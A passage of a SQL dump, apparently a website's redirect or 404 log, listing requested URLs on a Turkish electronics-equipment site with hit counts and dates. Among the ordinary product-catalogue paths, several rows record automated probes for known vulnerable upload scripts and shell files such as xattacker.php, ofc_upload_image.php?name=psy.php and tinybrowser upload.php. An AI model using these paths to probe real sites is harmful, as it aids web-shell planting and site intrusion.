00:00:00',301),(19845,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-50',NULL,'','',2,0,'2018-05-12 14:14:48','0000-00-00 00:00:00',301),(19846,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/results,1-50',NULL,'','',5,0,'2018-05-12 15:13:11','0000-00-00 00:00:00',301),(19847,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-10',NULL,'','',8,0,'2018-05-12 15:22:54','0000-00-00 00:00:00',301),(19848,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-50',NULL,'','',5,0,'2018-05-12 16:11:34','0000-00-00 00:00:00',301),(19849,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc',NULL,'','',6,0,'2018-05-12 16:21:17','0000-00-00 00:00:00',301),(19850,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-5',NULL,'','',5,0,'2018-05-12 17:39:07','0000-00-00 00:00:00',301),(19851,'http://www.3s-technologies.com.tr/tr/media/xattacker.txt',NULL,'','',79,0,'2018-05-12 18:15:01','0000-00-00 00:00:00',301),(19852,'http://www.3s-technologies.com.tr/tr/xattacker.php?x=attacker',NULL,'','',83,0,'2018-05-12 18:15:03','0000-00-00 00:00:00',301),(19853,'http://www.3s-technologies.com.tr/tr/xattacker.txt',NULL,'','',79,0,'2018-05-12 18:15:05','0000-00-00 00:00:00',301),(19854,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-10',NULL,'','',4,0,'2018-05-12 18:18:02','0000-00-00 00:00:00',301),(19855,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/dirdesc',NULL,'','',1,0,'2018-05-12 19:16:24','0000-00-00 00:00:00',301),(19856,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-20',NULL,'','',4,0,'2018-05-12 20:34:15','0000-00-00 00:00:00',301),(19857,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-05-12 21:22:54','0000-00-00 00:00:00',301),(19858,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-50',NULL,'','',4,0,'2018-05-12 22:21:16','0000-00-00 00:00:00',301),(19859,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-20',NULL,'','',1,0,'2018-05-13 00:19:35','0000-00-00 00:00:00',301),(19860,'http://3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'','',2,0,'2018-05-13 01:38:17','0000-00-00 00:00:00',301),(19861,'http://3s-technologies.com.tr/tr/static/js/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',3,0,'2018-05-13 01:42:09','0000-00-00 00:00:00',301),(19862,'http://3s-technologies.com.tr/tr/admin/lib/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',3,0,'2018-05-13 01:42:09','0000-00-00 00:00:00',301),(19863,'http://3s-technologies.com.tr/tr/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',3,0,'2018-05-13 01:42:10','0000-00-00 00:00:00',301),(19864,'http://3s-technologies.com.tr/tr/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php',NULL,'','',3,0,'2018-05-13 01:42:13','0000-00-00 00:00:00',301),(19865,'http://3s-technologies.com.tr/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'','',4,0,'2018-05-13 02:01:00','0000-00-00 00:00:00',301),(19866,'http://3s-technologies.com.tr/license.php',NULL,'http://3s-technologies.com.tr/wp-admin/','',13,0,'2018-05-13 02:07:09','0000-00-00 00:00:00',301),(19867,'http://3s-technologies.com.tr/assets/modules/evogallery/js/uploadify/uploadify.php',NULL,'','',3,0,'2018-05-13 02:26:36','0000-00-00 00:00:00',301),(19868,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-5',NULL,'','',8,0,'2018-05-13 02:34:41','0000-00-00 00:00:00',301),(19869,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-10',NULL,'','',7,0,'2018-05-13 03:50:02','0000-00-00 00:00:00',301),(19870,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-5',NULL,'','',5,0,'2018-05-13 05:13:44','0000-00-00 00:00:00',301),(19871,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-10',NULL,'','',8,0,'2018-05-13 07:19:19','0000-00-00 00:00:00',301),(19872,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,ordering/results,1-5',NULL,'','',1,0,'2018-05-13 07:52:48','0000-00-00 00:00:00',301),(19873,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-5',NULL,'','',3,0,'2018-05-13 08:59:47','0000-00-00 00:00:00',301),(19874,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-13 11:22:05','0000-00-00 00:00:00',301),(19875,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-20',NULL,'','',1,0,'2018-05-13 12:12:19','0000-00-00 00:00:00',301),(19876,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-10',NULL,'','',4,0,'2018-05-13 14:09:32','0000-00-00 00:00:00',301),(19877,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-10',NULL,'','',5,0,'2018-05-13 15:33:14','0000-00-00 00:00:00',301),(19878,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-50',NULL,'','',7,0,'2018-05-13 19:35:37','0000-00-00 00:00:00',301),(19879,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-10',NULL,'','',4,0,'2018-05-13 20:53:44','0000-00-00 00:00:00',301),(19880,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc',NULL,'','',9,0,'2018-05-13 21:29:43','0000-00-00 00:00:00',301),(19881,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-50',NULL,'','',1,0,'2018-05-13 22:47:26','0000-00-00 00:00:00',301),(19882,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2018-05-13 22:52:30','0000-00-00 00:00:00',301),(19883,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-10',NULL,'','',7,0,'2018-05-14 00:01:41','0000-00-00 00:00:00',301),(19884,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2018-05-14 00:59:49','0000-00-00 00:00:00',301),(19885,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc/results,1-5',NULL,'','',7,0,'2018-05-14 02:00:53','0000-00-00 00:00:00',301),(19886,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-20',NULL,'','',4,0,'2018-05-14 02:24:53','0000-00-00 00:00:00',301),(19887,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc/results,1-50',NULL,'','',4,0,'2018-05-14 03:00:53','0000-00-00 00:00:00',301),(19888,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',5,0,'2018-05-14 04:24:52','0000-00-00 00:00:00',301),(19889,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc/results,1-10',NULL,'','',7,0,'2018-05-14 05:12:52','0000-00-00 00:00:00',301),(19890,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-5',NULL,'','',9,0,'2018-05-14 05:36:52','0000-00-00 00:00:00',301),(19891,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',4,0,'2018-05-14 06:24:52','0000-00-00 00:00:00',301),(19892,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',7,0,'2018-05-14 06:36:52','0000-00-00 00:00:00',301),(19893,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2018-05-14 07:48:52','0000-00-00 00:00:00',301),(19894,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',5,0,'2018-05-14 08:24:52','0000-00-00 00:00:00',301),(19895,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',6,0,'2018-05-14 10:22:04','0000-00-00 00:00:00',301),(19896,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-05-14 11:22:04','0000-00-00 00:00:00',301),(19897,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',12,0,'2018-05-14 13:58:04','0000-00-00 00:00:00',301),(19898,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',5,0,'2018-05-14 16:10:03','0000-00-00 00:00:00',301),(19899,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',5,0,'2018-05-14 17:58:03','0000-00-00 00:00:00',301),(19900,'http://3s-technologies.com.tr/tr/server/php/',NULL,'http://3s-technologies.com.tr/tr/server/php/','',1,0,'2018-05-15 17:48:31','0000-00-00 00:00:00',301),(19901,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-20',NULL,'','',9,0,'2018-05-15 19:55:52','0000-00-00 00:00:00',301),(19902,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/dirdesc/results,1-10',NULL,'','',3,0,'2018-05-15 22:00:28','0000-00-00 00:00:00',301),(19903,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/results,1-20',NULL,'','',4,0,'2018-05-16 00:37:09','0000-00-00 00:00:00',301),(19904,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/dirdesc/results,1-50',NULL,'','',8,0,'2018-05-16 03:55:40','0000-00-00 00:00:00',301),(19905,'http://3s-technologies.com.tr/tr/cde42170f4f5b29105ed3977c1f5f4d1.php',NULL,'http://3s-technologies.com.tr/tr/cde42170f4f5b29105ed3977c1f5f4d1.php','',7,0,'2018-05-16 05:28:34','0000-00-00 00:00:00',301),(19906,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/results,1-5',NULL,'','',1,0,'2018-05-16 05:46:06','0000-00-00 00:00:00',301),(19907,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/results,1-20',NULL,'','',5,0,'2018-05-16 10:50:42','0000-00-00 00:00:00',301),(19908,'http://3s-technologies.com.tr/en/license.php',NULL,'http://3s-technologies.com.tr/license.php','',25,0,'2018-05-16 18:40:26','0000-00-00 00:00:00',301),(19909,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-10?language=en-gb',NULL,'','',4,0,'2018-05-16 23:27:49','0000-00-00 00:00:00',301),(19910,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,category_name/results,1-50',NULL,'','',1,0,'2018-05-17 01:43:30','0000-00-00 00:00:00',301),(19911,'http://www.3s-technologies.com.tr/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 02:42:32','0000-00-00 00:00:00',301),(19912,'http://www.3s-technologies.com.tr/en/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 02:42:35','0000-00-00 00:00:00',301),(19913,'http://www.3s-technologies.com.tr/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 02:56:57','0000-00-00 00:00:00',301),(19914,'http://www.3s-technologies.com.tr/en/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 02:58:28','0000-00-00 00:00:00',301),(19915,'http://www.3s-technologies.com.tr/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 03:07:57','0000-00-00 00:00:00',301),(19916,'http://www.3s-technologies.com.tr/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 03:09:01','0000-00-00 00:00:00',301),(19917,'http://www.3s-technologies.com.tr/en/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 03:22:45','0000-00-00 00:00:00',301),(19918,'http://www.3s-technologies.com.tr/en/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=psy.php',NULL,'http://www.3s-technologies.com.tr/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=psy.php','',1,0,'2018-05-17 03:26:44','0000-00-00 00:00:00',301),(19919,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css','',9,0,'2018-05-17 05:55:47','0000-00-00 00:00:00',301),(19920,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-5',NULL,'','',1,0,'2018-05-17 18:10:20','0000-00-00 00:00:00',301),(19921,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,ordering/results,1-10',NULL,'','',4,0,'2018-05-17 19:31:57','0000-00-00 00:00:00',301),(19922,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-20',NULL,'','',1,0,'2018-05-17 23:31:56','0000-00-00 00:00:00',301),(19923,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-50',NULL,'','',3,0,'2018-05-18 04:06:24','0000-00-00 00:00:00',301),(19924,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_sku/results,1-5',NULL,'','',2,0,'2018-05-18 06:11:54','0000-00-00 00:00:00',301),(19925,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-10',NULL,'','',5,0,'2018-05-18 09:09:03','0000-00-00 00:00:00',301),(19926,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2018-05-18 11:09:02','0000-00-00 00:00:00',301),(19927,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',6,0,'2018-05-18 13:09:03','0000-00-00 00:00:00',301),(19928,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_name/results,1-5',NULL,'','',4,0,'2018-05-18 13:14:45','0000-00-00 00:00:00',301),(19929,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-20',NULL,'','',7,0,'2018-05-18 15:46:44','0000-00-00 00:00:00',301),(19930,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_name/results,1-10',NULL,'','',2,0,'2018-05-18 16:46:44','0000-00-00 00:00:00',301),(19931,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',2,0,'2018-05-18 18:22:44','0000-00-00 00:00:00',301),(19932,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2018-05-18 20:46:43','0000-00-00 00:00:00',301),(19933,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-05-18 22:46:43','0000-00-00 00:00:00',301),(19934,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2018-05-19 00:58:43','0000-00-00 00:00:00',301),(19935,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/results,1-50',NULL,'','',10,0,'2018-05-19 02:27:36','0000-00-00 00:00:00',301),(19936,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2018-05-19 03:51:36','0000-00-00 00:00:00',301),(19937,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/results,1-20',NULL,'','',3,0,'2018-05-19 06:15:35','0000-00-00 00:00:00',301),(19938,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',3,0,'2018-05-19 07:03:35','0000-00-00 00:00:00',301),(19939,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku?language=en-gb',NULL,'','',3,0,'2018-05-19 08:31:35','0000-00-00 00:00:00',301),(19940,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-5',NULL,'','',4,0,'2018-05-19 09:11:37','0000-00-00 00:00:00',301),(19941,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-10',NULL,'','',3,0,'2018-05-19 10:31:35','0000-00-00 00:00:00',301),(19942,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-20',NULL,'','',7,0,'2018-05-19 11:31:34','0000-00-00 00:00:00',301),(19943,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-50',NULL,'','',1,0,'2018-05-19 13:11:34','0000-00-00 00:00:00',301),(19944,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/results,1-5',NULL,'','',4,0,'2018-05-19 13:33:08','0000-00-00 00:00:00',301),(19945,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',5,0,'2018-05-19 14:33:55','0000-00-00 00:00:00',301),(19946,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/results,1-10',NULL,'','',3,0,'2018-05-19 15:39:41','0000-00-00 00:00:00',301),(19947,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/results,1-50',NULL,'','',3,0,'2018-05-19 15:50:04','0000-00-00 00:00:00',301),(19948,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/results,1-20',NULL,'','',1,0,'2018-05-19 16:00:15','0000-00-00 00:00:00',301),(19949,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/results,1-10',NULL,'','',1,0,'2018-05-19 23:08:21','0000-00-00 00:00:00',301),(19950,'http://www.3s-technologies.com.tr/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'','',1,0,'2018-05-20 08:11:55','0000-00-00 00:00:00',301),(19951,'http://www.3s-technologies.com.tr/tr/administrator/',NULL,'','',23,0,'2018-05-20 13:56:16','0000-00-00 00:00:00',301),(19952,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,1-5?language=en-gb',NULL,'','',1,0,'2018-05-21 09:04:06','0000-00-00 00:00:00',301),(19953,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name?language=en-gb',NULL,'','',9,0,'2018-05-21 09:54:25','0000-00-00 00:00:00',301),(19954,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-formgenerator/uploads/php/',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-formgenerator/uploads/php/','',3,0,'2018-05-21 12:58:05','0000-00-00 00:00:00',301),(19955,'http://www.3s-technologies.com.tr/en/modules/â­simpleslideshow/â­uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/','',1,0,'2018-05-21 15:07:46','0000-00-00 00:00:00',301),(19956,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',3,0,'2018-05-21 19:21:44','0000-00-00 00:00:00',301),(19957,'http://3s-technologies.com.tr/tr/controller.php',NULL,'','',7,0,'2018-05-21 21:18:12','0000-00-00 00:00:00',301),(19958,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-05-21 21:59:46','0000-00-00 00:00:00',301),(19959,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-21 23:35:33','0000-00-00 00:00:00',301),(19960,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2018-05-22 11:13:14','0000-00-00 00:00:00',301),(19961,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',5,0,'2018-05-22 13:04:00','0000-00-00 00:00:00',301),(19962,'http://3s-technologies.com.tr/templates/ltemplate/ltemplate.php',NULL,'3s-technologies.com.tr','',4,0,'2018-05-22 14:02:42','0000-00-00 00:00:00',301),(19963,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2018-05-22 14:40:54','0000-00-00 00:00:00',301),(19964,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-22 16:03:59','0000-00-00 00:00:00',301),(19965,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-20',NULL,'','',3,0,'2018-05-22 17:13:13','0000-00-00 00:00:00',301),(19966,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-20',NULL,'','',2,0,'2018-05-22 18:08:36','0000-00-00 00:00:00',301),(19967,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',6,0,'2018-05-22 19:17:51','0000-00-00 00:00:00',301),(19968,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-50',NULL,'','',6,0,'2018-05-22 19:59:21','0000-00-00 00:00:00',301),(19969,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-10',NULL,'','',4,0,'2018-05-22 21:50:07','0000-00-00 00:00:00',301),(19970,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',4,0,'2018-05-22 22:45:30','0000-00-00 00:00:00',301),(19971,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',4,0,'2018-05-23 00:22:25','0000-00-00 00:00:00',301),(19972,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-05-23 00:36:17','0000-00-00 00:00:00',301),(19973,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',5,0,'2018-05-23 01:45:30','0000-00-00 00:00:00',301),(19974,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-05-23 02:13:11','0000-00-00 00:00:00',301),(19975,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',4,0,'2018-05-23 03:39:02','0000-00-00 00:00:00',301),(19976,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-50',NULL,'','',4,0,'2018-05-23 04:03:07','0000-00-00 00:00:00',301),(19977,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc/results,1-5',NULL,'','',4,0,'2018-05-23 05:03:08','0000-00-00 00:00:00',301),(19978,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2018-05-23 05:15:01','0000-00-00 00:00:00',301),(19979,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-05-23 07:03:01','0000-00-00 00:00:00',301),(19980,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-23 07:15:01','0000-00-00 00:00:00',301),(19981,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2018-05-23 08:03:08','0000-00-00 00:00:00',301),(19982,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2018-05-23 09:15:00','0000-00-00 00:00:00',301),(19983,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',2,0,'2018-05-23 09:27:01','0000-00-00 